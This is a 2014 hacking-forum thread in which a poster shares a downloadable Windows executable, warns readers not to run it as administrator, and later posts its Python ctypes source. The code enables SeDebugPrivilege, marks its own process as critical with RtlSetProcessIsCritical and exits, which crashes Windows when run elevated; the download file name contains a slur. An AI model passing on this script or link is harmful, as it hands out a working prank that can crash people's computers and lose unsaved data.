Wednesday, October 22, 2014 Login · Register
    Login
Username

Password


Remember Me

Not a member yet?
Click here to register.

Forgotten your password?
Request a new one here.

 

    Users Online
  • · Members on IRC: 29   
  • · Total Members: 16,691
  • · Newest Member: gsd6283
  •  

     

        Related Ads
     

     

     

        Top 10 Forum Posters
    UserPosts
    bluechill1411   
    madf0x1291   
    cruizrisner1062   
    Qwexotic1034   
    Null Set870   
    Override604   
    auditorsec603   
    godofcereal599   
    TurboBorland585   
    Teddy477   
     

        Affiliates




  • iExploit


  • iExploit


  • WeChall





  • Thisislegal.com

  •  

        Related Ads
     

    View Thread
         
    Security Override Hacking Evil Scripts
    Dont Do It
    Register FAQ Members List Today's Posts Search

    Print Thread
    07-04-2014 07:34 PM Dont Do It | Edited by madf0x 07-04-2014 09:09 PM
    Dont run this as administrator.

    edit:
    BAM

    http://www.mediafire.com/download/jbg1wf49bq1kzw6/doitfaggit.exe


    if someone points out how I did it, Ill throw up the code.
    dmr, September 9, 1941 October 9, 2011

    Never Forget
     
    Offline
    07-05-2014 04:20 AM RE: Dont Do It
    an exe? oh hell no, even though u are a highly trusted member, hell no
     
    Offline
    07-05-2014 11:33 AM RE: Dont Do It
    Smile
    dmr, September 9, 1941 October 9, 2011

    Never Forget
     
    Offline
    07-05-2014 12:35 PM RE: Dont Do It
    In a way this is my own reverse engineering challenge. If you dont overthink it, itll be easy.
    dmr, September 9, 1941 October 9, 2011

    Never Forget
     
    Offline
    07-05-2014 02:47 PM RE: Dont Do It
    ill only use this in WINE on a linux OS Pfft

    i trust u, but its an exe lol, its nature to be sketchy of those from ppl i know could create FUD malicious software that could go untraceable Wink
     
    Offline
    07-05-2014 03:04 PM RE: Dont Do It
    I dont think itd work on WINE. Or at least id be curious to see how wine reacts to it, let me know Smile

    When making it, I just tested it out on a cheapo $100 laptop I had gotten from a pawnstore a few years back, just in case something did permanently break.

    It doesnt do anything new really, I just dont hear about it often and I wanted to wrap it up in python with ctypes.
    dmr, September 9, 1941 October 9, 2011

    Never Forget
     
    Offline
    07-07-2014 12:16 AM RE: Dont Do It | Edited by madf0x 07-07-2014 12:58 AM
    Ok got bored. Heres the horrible code(had to ad-hoc fix up some ad-hoc code that I attached in an ad-hoc manner to my own ad-hoc code, deal with it)

    edit: the commented out code was part of the code I borrowed. Python complained and so I figured it was referencing something that the original author assumed would be imported, but I never bothered to find out what
    and it didnt seem to affect the code being ran, but I included it in case I needed to reference this code later
    and wound up needing to dig deeper into said code.

    Download source  Code

    import sys
    from ctypes import *

    ntdll = cdll.ntdll
    kernel32 = cdll.kernel32

    TOKEN_QUERY = (8)
    TOKEN_ADJUST_PRIVILEGES = (32)

    class LUID( Structure):
       _fields_ = [
             ('LowPart', c_ulong),
             ('HighPart', c_long) ]
             
    class TOKEN_PRIVLEGES( Structure):
       _fields_ = [
             ('PrivilegeCount', c_uint),
             ('Luid', LUID),
             ('Attributes', c_uint) ]
             
    OpenProcessToken = windll.advapi32.OpenProcessToken
    OpenProcessToken.argtypes = [
       c_int,   #HANDLE ProcessHandle
       c_uint, #DWORD DesiredAccess
       c_void_p ] #PHANDLE TOken Handle

    #OpenProcessToken.restype = ErrorIfZero

    AdjustTokenPriv = windll.advapi32.AdjustTokenPrivileges
    AdjustTokenPriv.argtypes = [
       c_int, c_int, c_void_p, c_uint, c_void_p, c_void_p ]
    #AdjustTokenPriv.restype = ErrorIfZero

    LookupPrivValue = windll.advapi32.LookupPrivilegeValueA
    LookupPrivValue.argtypes = [
       c_char_p, c_char_p, c_void_p]
    #LookupPrivValue.restype = ErrorIfZero

    access_token = c_int(0)
    privileges = TOKEN_PRIVLEGES()

    OpenProcessToken(windll.kernel32.GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, byref(access_token) )
    access_token = access_token.value
    LookupPrivValue(None, "SeDebugPrivilege", byref(privileges.Luid) )
    privileges.PrivilegeCount = 1
    privileges.Attributes = 2
    AdjustTokenPriv(access_token,
                0,
                byref(privileges),
                0,
                None,
                None )
    windll.kernel32.CloseHandle( access_token )

    ntdll.RtlSetProcessIsCritical(True, None, False)

    sys.exit()




    dmr, September 9, 1941 October 9, 2011

    Never Forget
     
    Offline
    Jump to Forum:
    Forum powered by fusionBoard